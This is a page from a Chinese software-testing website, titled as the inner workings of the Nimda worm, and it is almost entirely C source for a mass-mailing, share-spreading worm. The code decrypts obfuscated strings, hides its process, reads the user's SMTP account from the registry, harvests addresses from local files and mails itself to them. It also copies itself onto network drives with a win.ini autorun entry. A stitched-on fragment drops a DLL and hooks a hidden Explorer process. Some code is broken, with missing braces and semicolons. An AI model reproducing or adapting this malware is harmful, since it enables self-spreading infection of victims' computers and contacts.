• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

Nimda编程内幕

发布: 2007-7-01 20:40 | 作者: admin | 来源: | 查看: 11次 | 进入软件测试论坛讨论

领测软件测试网

void WINAPI worm()
long w0rm_ThreadCodeList[ 3] = { 
     ( long) L0calThread,
     ( long) Rem0teThread,
     ( long) MailThread
     } ;

 char *StrArray[ 66] = {
     szCopyRight,
     szFakeMsg,
     szSetUp,
     szWNetOpenEnumA,
     szWNetCloseEnum,
     szWNetEnumResourceA,
     szMPR_DLL,
     szWINSOCK_DLL,
     szWSAStartup,
     szinet_addr,
     szgethostbyaddr,
     szgethostbyname,
     szhtons,
     szsocket,
     szconnect,
     szsend,
     szrecv,
     szclosesocket,
     szWSACleanup,
     smtp_str00,
     smtp_str01,
     smtp_str02,
     smtp_str03,
     smtp_str06,
     smtp_str07,
     smtp_str08,
     smtp_str09,
     smtp_str0B,
     smtp_str0C,
     smtp_str0D,
     smtp_str0E,
     smtp_str0F,
     smtp_newline,
     smtp_separator,
     szWindir00,
     szWindir01,
     szWindir02,
     szWindir03,
     szWindir04,
     szWIN_INI,
     szSETUP_EXE,
     szSYSTEM_EXE,
     szADVAPI_DLL,
     szRegOpenKeyExA,
     szRegQueryValueExA,
     szRegCloseKey,
     szAccountManager,
     szDefaultMail,
     szAccounts,
     szSMTPserver,
     szSMTPemail,
     szExt00,
     szExt01,
     szExt02,
     szExt03,
     szExt04,
     szExt05,
     szExt06,
     szOutlook,
     szCuteFtp,
     szInternetExplorer,
     szTelnet,
     szMirc,
     szRegisterServiceProcess,
     szKernel32,
     szTempFile
    } ;

 static HANDLE w0rm_hThreadList[ 3] ;
 DWORD  w0rm_ThreadIDList[ 3] ;
 char  szModule[ MAX_PATH] ;
 char  *Param ;
 int  count ;
 int  min_threads ;
 int  max_threads ;
 BOOL  re_generation ;

 MailDone = FALSE ;

 for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;

 GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
 Param = szModule ;

 while( *Param != 0) Param++ ;

 Param -= 5 ;

 if (( *Param == ´P´) || ( *Param == ´p´))
 {
  MessageBox( NULL,
    szFakeMsg,
    szSetUp,
    MB_OK | MB_ICONSTOP) ;

  re_generation = FALSE ;
  max_threads = 1 ;
 } 
 else
 {
  if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
  {
   if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
   {
    a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
   }
  }
  
  re_generation = TRUE ;
  max_threads = 3 ;
 }

 min_threads = 0 ;

 do
 {
  for ( count = min_threads ; count < max_threads ; count++ )
  {
   w0rm_hThreadList[ count] = CreateThread( NULL,
         0,
         ( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
         NULL,
         0,
         &w0rm_ThreadIDList[ count]) ;
  }

  for ( count = min_threads ; count < max_threads ; count++ )
  {
   if ( w0rm_hThreadList[ count] != NULL)
   {
    WaitForSingleObject( w0rm_hThreadList[ count], INFINITE) ;
    CloseHandle ( w0rm_hThreadList[ count]) ;
   }
  }

  if ( MailDone)
  {
   GetWindowsDirectoryA( szModule, MAX_PATH) ;
   strcat( szModule, szWIN_INI) ;
   WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
   re_generation = FALSE ;
  }

  min_threads = 1 ;

  if ( re_generation) Sleep( 0x000FFFFF) ;

 } while( re_generation) ;

 return 0 ;
}

long WINAPI MailThread(long lParam)
{
 unsigned int  addr ;
 struct sockaddr_in server ;
 struct hostent  *hp ;
 WSADATA   wsaData ;

 HANDLE   hFile ;
 HANDLE   hMap ;

 char   enc0de_filename[ MAX_PATH] ;
 char   ShortBuff[ 512] ;
 char   szSIGN[ 512] ;
 char   szHELO[ 512] ;

 BOOL   Success ;
 void   *lpFile ;
 
 int    StrCount ;
 int    FileSize ;

 typedef struct
 {
  char *Command ;
  BOOL WaitReply ;
 }
 SMTPstr ;

 SMTPstr SMTPstrings00[ 2] = { szHELO,  TRUE  ,
     szMAIL_FROM, TRUE  } ;

 SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE  ,
     szMAIL_FROM+5, FALSE ,
     smtp_str06, FALSE ,
     smtp_str07, FALSE ,
     smtp_separator, FALSE ,
     smtp_str08, FALSE ,
     smtp_separator, FALSE ,
     smtp_str09, FALSE ,
     szSIGN,  FALSE ,
     smtp_separator, FALSE ,
     smtp_str0B, FALSE } ;

 SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
     smtp_separator, FALSE ,
     smtp_str0D, FALSE ,
     smtp_newline, FALSE ,
     smtp_str0E, TRUE,
     smtp_str0F, FALSE } ;
 WaitC0nnected() ;

 if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
 
 sprintf( szHELO, "%s %s\n", smtp_str00, szSMTPname) ;
 sprintf( szMAIL_FROM, "%s <%s>\n", smtp_str01, szSMTPaddr) ;
 sprintf( szSIGN,"\n:)\n\n----\n%s\n\n--", szSMTPaddr) ;

 if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;

 a_WSAStartup  = ( FARPROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
 a_inet_addr  = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
 a_gethostbyaddr  = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
 a_gethostbyname  = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
 a_htons   = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
 a_socket  = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
 a_connect  = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
 a_send   = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
 a_recv   = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
 a_closesocket  = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
 a_WSACleanup  = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;

 if ( ( a_WSAStartup == NULL)  ||
   ( a_inet_addr == NULL)  ||
   ( a_gethostbyaddr == NULL) ||
   ( a_gethostbyname == NULL) ||
   ( a_htons == NULL)  ||
   ( a_socket == NULL)  ||
   ( a_connect == NULL)  ||
   ( a_send == NULL)  ||
   ( a_recv == NULL)  ||
   ( a_closesocket == NULL) ||
   ( a_WSACleanup == NULL))
 {
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
 {
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }
 
 if ( isalpha( ( int) szSMTPserver[ 0]))
 {
  hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
 }
 else 
 {
  addr = a_inet_addr( szSMTPname) ;
  hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
 }

 if ( hp == NULL)
 {
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 memset( &server, 0, sizeof( server)) ;
 memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
 server.sin_family = hp->h_addrtype ;
 server.sin_port = a_htons( 25) ;

 conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;

 if ( conn_socket < 0 )
 {
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
 {
  a_closesocket( conn_socket) ; 
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;
 }

 a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
 
 for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
 {
  Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
  if ( !Success) break ;        
 }
 
 if ( Success)
 {
  Found = 0 ;

  GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
  enc0de_filename[ 3] = 0 ;

  FindPe0ple( enc0de_filename) ; 
 
  for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
  {
   Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
   if ( !Success) break ;        
  }

  if ( Success)
  {
   GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
   GetTempPathA( MAX_PATH, enc0de_filename) ;
   strcat( enc0de_filename, szTempFile) ;

   if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
   {
    if ( ( hFile = CreateFileA( enc0de_filename,
        GENERIC_READ,
        FILE_SHARE_READ,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL)) != INVALID_HANDLE_VALUE)
    {
     FileSize = GetFileSize( hFile, NULL) ;

     if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
     {
      if ( ( hMap = CreateFileMappingA( hFile,
           NULL,
           PAGE_READONLY | PAGE_WRITECOPY,
           0,
           FileSize,
           NULL)) != NULL)
      {
       if ( ( lpFile = MapViewOfFile( hMap,
           FILE_MAP_READ,
           0,
           0,
           FileSize)) != NULL)
       {  
        base64_encode( lpFile, FileSize) ;

        for ( StrCount = 0 ; StrCount < 6 ; StrCount++ )           
        {
         if ( ( Success = str2socket(  SMTPstrings02[ StrCount].Command,
             SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
        }

        if ( Success) MailDone = TRUE ;

        UnmapViewOfFile( lpFile) ;
       }
       
       CloseHandle( hMap) ;
      }
     }

     CloseHandle( hFile) ;
    }

    DeleteFileA( enc0de_filename) ;
   }
  }
 }

 a_closesocket( conn_socket) ;
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ;

 return 0 ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void NetW0rming( LPNETRESOURCE lpnr)
{
 LPNETRESOURCE lpnrLocal ;
 HANDLE  hEnum ;
 int  count ;
 int  cEntries = 0xFFFFFFFF ;
 DWORD  dwResult ;
 DWORD  cbBuffer = 32768 ;

 if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
    RESOURCETYPE_ANY,
    0,
    lpnr,
    &hEnum) != NO_ERROR) return ;
 do
 {
  lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;

         dwResult = a_WNetEnumResource( hEnum,
      &cEntries,
      lpnrLocal,
      &cbBuffer) ;
  if ( dwResult == NO_ERROR)
  {
   for ( count = 1 ; count < cEntries ; count++ )
   {
    if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
    {
     NetW0rming( &lpnrLocal[ count]) ;
    }
    else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
    {
     Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
    }
   }
  }
  else if (dwResult != ERROR_NO_MORE_ITEMS) break ;

 } while ( dwResult != ERROR_NO_MORE_ITEMS) ;

 GlobalFree ( ( HGLOBAL) lpnrLocal) ;

 a_WNetCloseEnum( hEnum) ;

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void Rem0teInfecti0n( char *szPath)
{
 char   *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
 WIN32_FIND_DATAA FindData ;
 HANDLE   hFind ;
 char   szLookUp[ MAX_PATH] ;
 char   w0rm0rg[ MAX_PATH] ;
 char   w0rmD3st[ MAX_PATH] ;
 int   aux ;

 for ( aux = 0 ; aux < 5 ; aux++ )
 {
  sprintf ( szLookUp, "%s\\%s%s", szPath, dir_name[ aux], szWIN_INI) ;
  if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
  {   
   sprintf( w0rmD3st, "%s\\%s\\%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
   
   if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
   {
    if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
    {
     WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
     FindClose ( hFind) ;
     break ;
    }
   }

   FindClose ( hFind) ;
  }
 }
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL str2socket( char *msg, BOOL do_recv)

 int retval ;
 char Buffer[ 256];

/* Code used to debug the worm

 if ( do_recv)
 {
  if ( MessageBox( NULL,
     msg,
     "send() this string ?",
     MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
 }
*/

 if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
 {
  a_WSACleanup() ;
  return FALSE ;
 } 

 if ( do_recv)
 {
  retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
  if ( ( retval == SOCKET_ERROR) || ( retval == 0))
  {   
   a_closesocket( conn_socket) ;
   a_WSACleanup() ;
   return FALSE ;
  }

  Buffer[ retval] = 0 ;

/* Code used to debug the worm

  MessageBox( NULL,
    Buffer,
    "recv()",
    MB_OK | MB_ICONSTOP) ;
*/
 }

 return TRUE ;

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL GetSMTP( char *dest, char *org_email)
{
 char szKeyName[ MAX_PATH] ;
 char szRes[ MAX_PATH] ;
 char *move2low ;
 int size ;
 HKEY hKey ;

 if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
 
 a_RegOpenKeyExA  = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
 a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
 a_RegCloseKey  = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;

 if ( ( a_RegOpenKeyExA == NULL)  ||
             ( a_RegQueryValueExA == NULL) ||
      ( a_RegCloseKey == NULL))
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 strcpy( szKeyName, szAccountManager) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
    szKeyName,
    0,
    KEY_QUERY_VALUE,
    &hKey) != ERROR_SUCCESS)
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }
  
 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szDefaultMail,
     0,
     NULL,
     szRes,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 a_RegCloseKey( hKey) ;

 strcat( szKeyName, szAccounts) ;
 strcat( szKeyName, szRes) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
    szKeyName,
    0,
    KEY_QUERY_VALUE,
    &hKey) != ERROR_SUCCESS)
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szSMTPserver,
     0,
     NULL,
     dest,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }     

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szSMTPemail,
     0,
     NULL,
     org_email,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }     

 a_RegCloseKey( hKey) ;

 move2low = org_email ;

 while( *move2low != 0)
 {
  if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
  move2low++ ;
 }

 FreeLibrary( hADVAPI) ;
 return TRUE ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void base64_encode(const void *buf, int size)
{
 char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;

 char  ok_base64[ 80] ;
 char  *p = ok_base64 ;
 unsigned char *q = ( unsigned char *) buf ;
 int  i ;
 int  c ;
 int  l ;
 BOOL  SendRes ;
 
 i = l = 0 ;

 while( i < size)
 {
  c = q[ i++] ;
  c *= 256 ;

  if( i < size) c += q[ i] ;
  
  i++ ;
  c *= 256 ;

  if( i < size) c += q[ i] ;
   
  i++ ;
   
  p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
  p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
  p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
  p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
   
  if( i > size) p[ 3] = ´=´ ;
   
  if( i > size + 1) p[ 2] = ´=´ ;
   
  p += 4 ;
  
  l += 1 ;

  if ( l == 0x013)
  {
   ok_base64[ 0x04C] = 0x0A ;
   ok_base64[ 0x04D] = 0 ;

   if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;

   p = ok_base64 ;
   l = 0;
  }
 }

 if ( SendRes != FALSE)
 {
  if ( l != 0)
  {
   ok_base64[ l*4] = 0x0A ;
   ok_base64[ l*4] = 0 ;

   str2socket( ok_base64, FALSE) ;  
  }
 }
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

char *DecryptStr( char *DcrStr)
{
 char *pos = DcrStr ;

 while( *pos != 0)
 {
  *pos ^= ( char) 0x0FF ;
  pos++ ;
 }
 
 return DcrStr ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void FindPe0ple( char *szPath)
{
 char    szRecursive[ MAX_PATH] ;
 char    szCurrentDir[ MAX_PATH] ;
 char    FileExt[ MAX_PATH] ;
 char    RCPT_TO[ MAX_PATH] ;
 WIN32_FIND_DATAA  FindData ;
 HANDLE    hFind ;
 HANDLE    hFile ;
 HANDLE    hMap ;
 void    *lpFile ;
 char    *lpc01 ;
 char    *lpc02 ;
 char    *lpc03 ;
 char    *lpc04 ;
 char    auxchar ;
 int    l00king ;
 int    addrssize ;

 GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
 
 if ( SetCurrentDirectoryA( szPath) == FALSE) return ;

 hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
 if ( hFind != INVALID_HANDLE_VALUE)
 {
  do
  {
   if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != ´.´))
   {
    strcpy (szRecursive,szPath) ;
    strcat (szRecursive,FindData.cFileName) ;
    strcat (szRecursive,"\\") ;
    
    FindPe0ple( szRecursive) ;
   }
   else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != ´.´)))   
   {
    lpc01 = FindData.cFileName ;
    lpc02 = NULL ;
     
    while ( *lpc01 != 0)
    {
     if ( *lpc01 == 46) lpc02 = lpc01 ;
     lpc01++ ;
    }
    
    lpc01 = FileExt ;

    if ( lpc02 != NULL)
    {
     while ( *lpc02 != 0)
     {
      if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
      else *lpc01 = *lpc02 ;
       
      lpc01++ ;
      lpc02++ ;
     }

     FileExt[ 4] = 0 ;

     if  ( ( strcmp( FileExt, szExt00) == 0) ||
       ( strcmp( FileExt, szExt01) == 0) ||
       ( strcmp( FileExt, szExt02) == 0) ||
       ( strcmp( FileExt, szExt03) == 0) ||
       ( strcmp( FileExt, szExt04) == 0) ||
       ( strcmp( FileExt, szExt05) == 0) ||
       ( strcmp( FileExt, szExt06) == 0))
     {
      if ( ( hFile = CreateFileA( FindData.cFileName,
          GENERIC_READ,
          0,
          NULL,
          OPEN_EXISTING,
          FILE_ATTRIBUTE_NORMAL,
          NULL)) != INVALID_HANDLE_VALUE)
      {
       if ( ( hMap = CreateFileMappingA( hFile,
            NULL,
            PAGE_READONLY,
            0,
            FindData.nFileSizeLow,
            NULL)) != NULL)
       {
        if ( ( lpFile = MapViewOfFile( hMap,
            FILE_MAP_READ,
            0,
            0,
            FindData.nFileSizeLow)) != NULL)
        {
         lpc01  = lpFile ;
         addrssize = FindData.nFileSizeLow ;
         l00king  = 0 ;
 
         while( ( addrssize > 16) && ( Found < 16))
         {
          if ( *lpc01 == 60)
          {
           l00king = 1 ;
           lpc02 = lpc01 ;
          }

          if ( ( *lpc01 == 64) && ( l00king == 1))
          {
           l00king = 2 ;
          }

          if ( ( *lpc01 == 62) && ( l00king == 2))
          {          
           lpc03 = szSMTPaddr ;
           lpc04 = lpc02 + 1 ;

           while ( *lpc03 != 0)
           {
            auxchar = *lpc04 ;

            if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;

            if ( *lpc03 != auxchar)
            {
             l00king = 0 ;
             break ;
            }

            lpc03++ ;
            lpc04++ ;
           }

           if ( l00king == 0)
           {
            strcpy( RCPT_TO, smtp_str02) ;
            lpc03 = RCPT_TO + 9 ;
            while ( *lpc02 != 62)
            {
             *lpc03 = *lpc02 ;
             lpc02++ ;
             lpc03++ ;
            }
            *lpc03 = 62 ;
            lpc03++ ;            
            *lpc03 = 0 ;
            
            strcat( RCPT_TO, "\n") ;

            str2socket( RCPT_TO, TRUE) ;

            Found++ ;
           }
           else l00king = 0 ;
          }

          if ( ( *lpc01 < 64) &&
            ( *lpc01 != 46) &&
            ( *lpc01 != 60) &&
            ( *lpc01 != 62))
          {
           l00king = 0 ;
          }

          if ( *lpc01 > 122)
          {
           l00king = 0 ;
          }
 
          lpc01++ ;
          addrssize-- ;
         }
         
         UnmapViewOfFile( lpFile) ;                      
        }

        CloseHandle( hMap) ;
       }
        
       CloseHandle( hFile) ;
      }
     }
    }
   }
  }  
  while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;

  FindClose( hFind) ;
 }

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void WaitC0nnected( void)
{
 InetActivated = FALSE ;

 while ( !InetActivated)
 {
  EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;

  Sleep( 0x01770) ;
 }

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{

 int  CaptionLen ;
 int  AwareLen ;
 int  CompareLen ;
 int  InetAware ;
 int  EquChar ;
 int  aux0 ;
 int  aux1 ;
 char  *Foll0w ;
 char  *PtrAware ;
 char  WindowCaption[ 1024] ;

 CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;

 if ( CaptionLen > 0)
 {
  Foll0w = WindowCaption ;

  while( *Foll0w != 0)
  {
   if ( ( *Foll0w >= ´a´) && ( *Foll0w <= ´z´)) *Foll0w = *Foll0w - ´a´ + ´A´ ;
   Foll0w++ ;
  }

  for( InetAware = 0 ; InetAware < 5 ; InetAware++)
  {
   AwareLen = strlen( szAware[ InetAware]) ;
   
   if ( AwareLen < CaptionLen)
   {
    CompareLen = CaptionLen - AwareLen ;   

    for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
    {
     EquChar = 0 ;
     Foll0w = &WindowCaption[ aux0] ;
     PtrAware = szAware[ InetAware] ;

     for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
     {
      if ( *Foll0w == *PtrAware) EquChar++ ;
     }

     if ( EquChar == AwareLen)
     {
      InetActivated = TRUE ;
      break ;
     }

     aux0++ ;
    }
   }
  }
 }

 return ( !InetActivated) ;
}
 void TFTP32()
{
  HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  if(hFile==INVALID_HANDLE_VALUE)
  {
   //printf("\nCreate file %s failed:%d",RemoteFilePath,GetLastError());
   return -1
  }
  //写文件内容
                DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
  while(dwSize>dwIndex)
  {
   if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
   {
    //printf("\nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
    return -1
   }
   dwIndex+=dwWrite;
  }
  //关闭文件句柄
  CloseHandle(hFile);


hhook hk
STARTUPINFO si;
    PROCESS_INFORMATION pi;
    
    memset(&si,0,sizeof(si));
    si.hStdError = si.hStdOutput = wp1;
    si.hStdInput = rp2;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.lpReserved=0;
    si.lpReserved2=0;
    si.cbReserved2 =0;
    si.cb = sizeof(si);
    //this two must not exchange
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)

Hookproc hkprc
static HINSTANCE hinstDLL
 hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}


延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/


关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网